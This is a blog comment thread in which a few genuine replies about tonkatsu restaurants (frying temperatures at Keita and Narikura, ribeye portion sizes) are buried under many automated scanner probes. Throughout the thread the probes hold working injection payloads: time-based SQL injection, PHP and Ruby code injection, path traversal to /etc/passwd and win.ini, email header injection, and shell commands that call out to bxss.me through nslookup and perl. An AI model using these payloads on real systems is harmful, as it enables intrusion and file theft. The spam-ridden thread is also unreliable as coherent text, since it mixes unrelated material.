.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(117).concat(67).concat(119).concat(80)+(require"socket"
Socket.gethostbyname("hitei"+"gcjlqygdb296d.bxss.me.")[3].to_s)+"
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(121).concat(87).concat(107).concat(80)+(require'socket'
Socket.gethostbyname('hitie'+'rovjjdzu5afee.bxss.me.')[3].to_s)+'
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
'"
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
<!--
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+489-489-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+489-489-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+820-820-1=0+0+0+1
re: Eric Yu
-1 OR 3+820-820-1=0+0+0+1
re: Eric Yu
-1' OR 2+507-507-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+507-507-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+739-739-1=0+0+0+1 or 'eP9HY9mD'='
re: Eric Yu
-1' OR 3+739-739-1=0+0+0+1 or 'eP9HY9mD'='
re: Eric Yu
-1" OR 2+29-29-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+29-29-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
QN8yzSQm'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 120=(SELECT 120 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 889=(SELECT 889 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 577=(SELECT 577 FROM PG_SLEEP(15))--
re: Eric Yu
2MgUD5z6' OR 432=(SELECT 432 FROM PG_SLEEP(15))--
re: Eric Yu
jHaf2JmA') OR 865=(SELECT 865 FROM PG_SLEEP(15))--
re: Eric Yu
7Hqb8pSE')) OR 164=(SELECT 164 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@gXxPk
Thanks for clarifying, Eric! :) I wasn’t aware that it was just a change in sugar levels. I’ve only ever tried the breed with the darker fry, and not the lighter one to compare. That said, the low temp fry at Keita still seems to turn up a batter that’s more crunchy and less delicate than the one at Narikura though. I know Narikura has fans, but the texture doesn’t work for me (haha feels like eating powder snow). Keita hits the sweet spot for me.
Kippei looks good! What portion does their ribeye come in? Was absolutely defeated by Aoki’s 400g ribeye, and have never ordered one since, haha
re: guest
dGfPOijq
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+85-85-1=0+0+0+1
re: guest
-1 OR 3+85-85-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
hI10uLxT'; waitfor delay '0:0:15' --
re: guest
-5 OR 396=(SELECT 396 FROM PG_SLEEP(15))--
re: guest
-5) OR 70=(SELECT 70 FROM PG_SLEEP(15))--
re: guest
-1)) OR 371=(SELECT 371 FROM PG_SLEEP(15))--
re: guest
tFxzY6wv' OR 800=(SELECT 800 FROM PG_SLEEP(15))--
re: guest
OECv6I9M') OR 434=(SELECT 434 FROM PG_SLEEP(15))--
re: guest
61NIaI0h')) OR 488=(SELECT 488 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@0w8Zk
re: guest
s5Albn2s
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+158-158-1=0+0+0+1
re: guest
-1 OR 3+158-158-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
IF7HGnJA'; waitfor delay '0:0:15' --
re: guest
-5 OR 607=(SELECT 607 FROM PG_SLEEP(15))--
re: guest
-5) OR 402=(SELECT 402 FROM PG_SLEEP(15))--
re: guest
-1)) OR 330=(SELECT 330 FROM PG_SLEEP(15))--
re: guest
3BMAwztu' OR 739=(SELECT 739 FROM PG_SLEEP(15))--
re: guest
7ECpRlB4') OR 648=(SELECT 648 FROM PG_SLEEP(15))--
re: guest
7vtdmzJK')) OR 589=(SELECT 589 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@nadT5
re: guest
1rm9LbVcO
re: guest
response.write(9752697*9071868)
re: guest
'+response.write(9752697*9071868)+'
re: guest
"+response.write(9752697*9071868)+"
re: guest
%0abcc:074625.67-10098.67.b0005.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-10099.67.b0005.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${10000352+9999312}
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
/etc/passwd
re: guest
)
re: guest
echo bstrzo$()\ erhrph\nz^xyu||a #' &echo bstrzo$()\ erhrph\nz^xyu||a #|" &echo bstrzo$()\ erhrph\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
!(()&&!|*|*|
re: guest
&echo ruaxbx$()\ fnofwk\nz^xyu||a #' &echo ruaxbx$()\ fnofwk\nz^xyu||a #|" &echo ruaxbx$()\ fnofwk\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
^(#$!@#$)(()))******
re: guest
|echo rhfljh$()\ nbwhqn\nz^xyu||a #' |echo rhfljh$()\ nbwhqn\nz^xyu||a #|" |echo rhfljh$()\ nbwhqn\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitbxhnwupyzv9d35a.bxss.me||perl -e "gethostbyname('hitbxhnwupyzv9d35a.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hitvvepkecaso1e5ea.bxss.me||perl -e "gethostbyname('hitvvepkecaso1e5ea.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&nslookup hitnobzbrwnux830e0.bxss.me&'\"`0&nslookup hitnobzbrwnux830e0.bxss.me&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
&(nslookup hitriqvisvbuz67655.bxss.me||perl -e "gethostbyname('hitriqvisvbuz67655.bxss.me')")&'\"`0&(nslookup hitriqvisvbuz67655.bxss.me||perl -e "gethostbyname('hitriqvisvbuz67655.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
Http://bxss.me/t/fit.txt
re: guest
'.gethostbyname(lc('hitdr'.'tqogqsrtef8c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(79).chr(116).chr(80).'
re: guest
|(nslookup hitfftohddyxmf6815.bxss.me||perl -e "gethostbyname('hitfftohddyxmf6815.bxss.me')")
re: guest
file:///etc/passwd
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
".gethostbyname(lc("hitra"."vyjflkop50a55.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(71).chr(115).chr(72)."
re: guest
`(nslookup hitwujriopzfs2bf1c.bxss.me||perl -e "gethostbyname('hitwujriopzfs2bf1c.bxss.me')")`
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/etc/shells
re: guest
;(nslookup hitfyqnivjxbm5d78e.bxss.me||perl -e "gethostbyname('hitfyqnivjxbm5d78e.bxss.me')")|(nslookup hitfyqnivjxbm5d78e.bxss.me||perl -e "gethostbyname('hitfyqnivjxbm5d78e.bxss.me')")&(nslookup hitfyqnivjxbm5d78e.bxss.me||perl -e "gethostbyname('hitfyqnivjxbm5d78e.bxss.me')")
re: guest
/WEB-INF/web.xml
re: guest
c:/windows/win.ini
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
bxss.me
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(104).concat(80).concat(107).concat(90)+(require"socket"
Socket.gethostbyname("hitii"+"ixfiyfdy6cee8.bxss.me.")[3].to_s)+"
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
'+'A'.concat(70-3).concat(22*4).concat(115).concat(88).concat(103).concat(67)+(require'socket'
Socket.gethostbyname('hitls'+'zzkeepdgcb4c3.bxss.me.')[3].to_s)+'
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
';print(md5(31337));$a='
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
";print(md5(31337));$a="
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
${@print(md5(31337))}
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
${@print(md5(31337))}\
re: guest
WEB-INF/web.xml
re: guest
'"
re: guest
'.print(md5(31337)).'
re: guest
WEB-INF\web.xml
re: guest
<!--
re: guest
1
re: guest
1
re: guest
-1 OR 2+737-737-1=0+0+0+1 --
re: guest
-1 OR 3+737-737-1=0+0+0+1 --
re: guest
-1 OR 2+574-574-1=0+0+0+1
re: guest
-1 OR 3+574-574-1=0+0+0+1
re: guest
-1' OR 2+260-260-1=0+0+0+1 --
re: guest
-1' OR 3+260-260-1=0+0+0+1 --
re: guest
-1' OR 2+508-508-1=0+0+0+1 or '1DJhMzm3'='
re: guest
-1' OR 3+508-508-1=0+0+0+1 or '1DJhMzm3'='
re: guest
-1" OR 2+344-344-1=0+0+0+1 --
re: guest
-1" OR 3+344-344-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
6iK1BiV9'; waitfor delay '0:0:15' --
re: guest
-5 OR 363=(SELECT 363 FROM PG_SLEEP(15))--
re: guest
-5) OR 58=(SELECT 58 FROM PG_SLEEP(15))--
re: guest
-1)) OR 309=(SELECT 309 FROM PG_SLEEP(15))--
re: guest
zHiZxFyx' OR 79=(SELECT 79 FROM PG_SLEEP(15))--
re: guest
lPJsMHVS') OR 58=(SELECT 58 FROM PG_SLEEP(15))--
re: guest
Wtrx4cqn')) OR 710=(SELECT 710 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@01NTV
All good :) The extra crunch is likely due to the higher temp finish Keita does, which I believe Narikura does not do. For the record, I love eating powdered snow. Kakigori but in panko and pork form haha. Keita is excellent as well though.
It starts at 200g so don't need to commit to anything overly big. 400g is massive, I don't think I could even finish it with my large tonkatsu appetite!
re: Eric Yu
rS1j9D0f
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+146-146-1=0+0+0+1
re: Eric Yu
-1 OR 3+146-146-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
L17h2tCP'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 40=(SELECT 40 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 987=(SELECT 987 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 181=(SELECT 181 FROM PG_SLEEP(15))--
re: Eric Yu
